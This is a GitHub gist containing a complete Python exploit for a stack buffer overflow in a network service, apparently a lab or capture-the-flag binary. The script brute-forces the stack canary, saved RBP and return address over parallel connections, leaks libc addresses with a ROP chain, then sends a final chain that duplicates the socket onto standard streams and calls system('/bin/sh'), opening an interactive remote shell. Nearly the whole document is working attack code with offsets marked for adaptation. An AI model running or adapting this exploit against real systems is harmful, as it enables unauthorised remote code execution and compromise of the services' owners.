Last active
June 8, 2020 20:47
-
-
Save ShivamShrirao/e581e547e0fc15e24a98648b1ab4964a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from struct import pack,unpack | |
from threading import Thread | |
from telnetlib import Telnet | |
from time import sleep | |
import socket | |
import sys | |
p64 = lambda x: pack("Q",x) # convert to little endian | |
u64 = lambda x: unpack("Q",x)[0] # revert back from little endian | |
TRGT = (sys.argv[1], int(sys.argv[2])) # ip and port as arguments | |
N_THREADS = 256 # number of maximum threads, reduce according to your machine | |
def Threaded(fn): # annotation wrapper to launch a function as a thread | |
def wrapper(*args, **kwargs): | |
t = Thread(target=fn, args=args, kwargs=kwargs) | |
t.setDaemon(True) | |
t.start() | |
return t | |
return wrapper | |
def default_range(leak): # default range of values | |
return range(0x100) # '0x00' to '0xff' | |
class FoundInstance: # class to store flag for finding a particular byte | |
def __init__(self): | |
self.FOUND_IT=False | |
class Bruter: # class to bruteforce addresses | |
def __init__(self): | |
self.start = b'' # start bytes of address | |
self.end = b'' # end bytes of address | |
self.buf = b'A'*200 # length of buffer | |
self.msg = "Leaking : \t" # message to print | |
self.thrds = [] # store the threads | |
@Threaded # will make it launch as a thread | |
def find_at(self, val, inst, ln_st): | |
if not inst.FOUND_IT: # check flag if particular byte was found | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect(TRGT) # connect to target | |
s.recv(1024) # receive input prompt | |
s.send(self.buf + self.start+bytes([val])) # send payload with next attempted byte val | |
ret=s.recv(1024) # receive response | |
s.close() # close socket | |
if b'Request complete, Closing' in ret: # check if server sent correct response | |
if not inst.FOUND_IT: # if values isn't found yet, done to check for some race conditions | |
if len(self.start) == ln_st: # check if it's not changed. | |
self.start+=bytes([val]) # add the correct byte | |
inst.FOUND_IT=True # set flag | |
def iterate_range(self,get_range): | |
inst=FoundInstance() | |
for val in get_range(self.start): | |
self.thrds.append(self.find_at(val, inst, len(self.start))) | |
print('\r' + self.msg + '0x' + self.end.hex() + (hex(val)[2:]+self.start[::-1].hex()).rjust(16-2*len(self.end), '0'), end=' ') | |
while len(self.thrds)>=N_THREADS: # to wait if max threads are reached | |
sleep(0.2) # wait a bit | |
for ix,t in enumerate(self.thrds): # enumerate through threads | |
if not t.is_alive(): # check if thread has finished executing | |
self.thrds.pop(ix) # remove thread if executed | |
if inst.FOUND_IT: | |
return # return from function if found during while loop | |
if inst.FOUND_IT: | |
return # return from function if found during for loop | |
def call(self, get_range=default_range): | |
len_rem = 8-len(self.end) # calculate no of bytes remaining | |
while len(self.start)<len_rem: # until all bytes are found | |
self.iterate_range(get_range) # call function to check all values for particular byte in range | |
print('\r' + self.msg + '0x' + self.end.hex() + self.start[len_rem::-1].hex().rjust(16-2*len(self.end), '0'), end=' ') | |
print() | |
return self.start[:len_rem] + self.end[::-1]# return complete address | |
brt = Bruter() # initialize bruter | |
brt.start = b'\x00' # stack canary always has 0x00 a null byte | |
brt.end = b'' # no pattern for this | |
brt.buf = b'A'*200 # buffer length, offset to canary | |
brt.msg = "Leaking CANARY:\t" | |
CANARY = u64(brt.call()) # call and start bruteforce, save canary to variable | |
brt = Bruter() | |
brt.start = b'' | |
brt.end = b'\x00\x00\x7f' # RBP has this constant | |
brt.buf = b'A'*200 | |
brt.buf += p64(CANARY) # add leaked canary to payload | |
brt.msg = "Leaking RBP:\t" | |
def rbp_range(leak): | |
if len(leak)==4: # 5th byte of RBP changes from 0xfc to 0xff | |
return range(0xfc,0x100) | |
else: | |
return range(0x100) | |
RBP = u64(brt.call(rbp_range)) | |
# Offset to return address is 0x1552. REMEMBER TO CHANGE THESE ACCORDING TO YOUR BINARY | |
brt = Bruter() | |
brt.start = b'\x52' #CHANGE ME # return address constant byte at start | |
brt.end = b'\x00\x00' # constant bytes at end | |
brt.buf = b'A'*200 | |
brt.buf += p64(CANARY) # add leaked canary | |
brt.buf += p64(RBP) # add leaked RBP | |
brt.msg = "Leaking RET:\t" | |
def ret_range(leak): | |
if len(leak)==1: # '5 52' is constant. '0x52' is already in start variable | |
return range(0x5,0x100,0x10)#CHANGE ME # generates values ending with '5' | |
if len(leak) == 5: | |
return range(0x55,0x57) # 6th byte changes from '0x55' to '0x56' | |
else: | |
return range(0x100) | |
RET = u64(brt.call(ret_range)) | |
BIN_BASE = RET - 0x1552 # CHANGE ME # Subtract offset to return address to get base address of bianry | |
print("[*] Binary base calculated:\t",hex(BIN_BASE)) | |
pop_rdi = BIN_BASE + 0x001643 | |
pop_rsi_r15 = BIN_BASE + 0x001641 | |
ret_gad = BIN_BASE + 0x1306 | |
write_plt = BIN_BASE + 0x1060 | |
write_got = BIN_BASE + 0x4030 | |
buf = b'A'*200 | |
buf+= p64(CANARY) | |
buf+= p64(RBP) | |
buf+= p64(pop_rsi_r15) # just load address of write_got into rsi, rdi and rdx are already filled | |
buf+= p64(write_got)*2 # 2 times for r15 | |
buf+= p64(write_plt) # call write | |
buf+= p64(RET) # continue execution normally | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect(TRGT) | |
s.recv(1024) | |
s.send(buf) | |
ret = s.recv(1024) | |
print(ret[:128]) | |
libc_write = u64(ret[:8]) # first 8 bytes will be liibc address of write | |
libc_getpid = u64(ret[8:16]) | |
print("[*] Leaked libc write:\t",hex(libc_write)) | |
print("[*] Leaked libc getpid:\t",hex(libc_getpid)) | |
libc_write_off = 0x0f0b40 | |
LIBC_BASE = libc_write - libc_write_off | |
print("[*] Libc base calculated:\t",hex(LIBC_BASE)) | |
dup2 = LIBC_BASE + 0x0f13a0 | |
system = LIBC_BASE + 0x0496e0 | |
bin_sh = LIBC_BASE + 0x18c143 | |
print("[*] Generating final payload.") | |
buf = b'A'*200 | |
buf+= p64(CANARY) | |
buf+= p64(RBP) | |
buf+= p64(ret_gad) # for stack alignment to 16 bytes | |
buf+= p64(pop_rsi_r15) # '4' already in rdi so continue from rsi | |
buf+= p64(2)*2 # stderr | |
buf+= p64(dup2) # call dup2 | |
buf+= p64(pop_rsi_r15) | |
buf+= p64(1)*2 # stdout | |
buf+= p64(dup2) # call dup2 | |
buf+= p64(pop_rsi_r15) | |
buf+= p64(0)*2 # stdin | |
buf+= p64(dup2) # call dup2 | |
buf+= p64(pop_rdi) | |
buf+= p64(bin_sh) | |
buf+= p64(system) | |
buf+= p64(RET) # continue execution normally with actual return address | |
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
s.connect(TRGT) | |
s.recv(1024) | |
s.send(buf) | |
print("[*] Payload sent.") | |
sleep(1) # just a little wait to finish execution | |
t = Telnet() # make a telnet object | |
t.sock = s # assign socket to telnet | |
t.write(b'id\n') # enter a command | |
t.interact() # get interactive shell over telnet |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment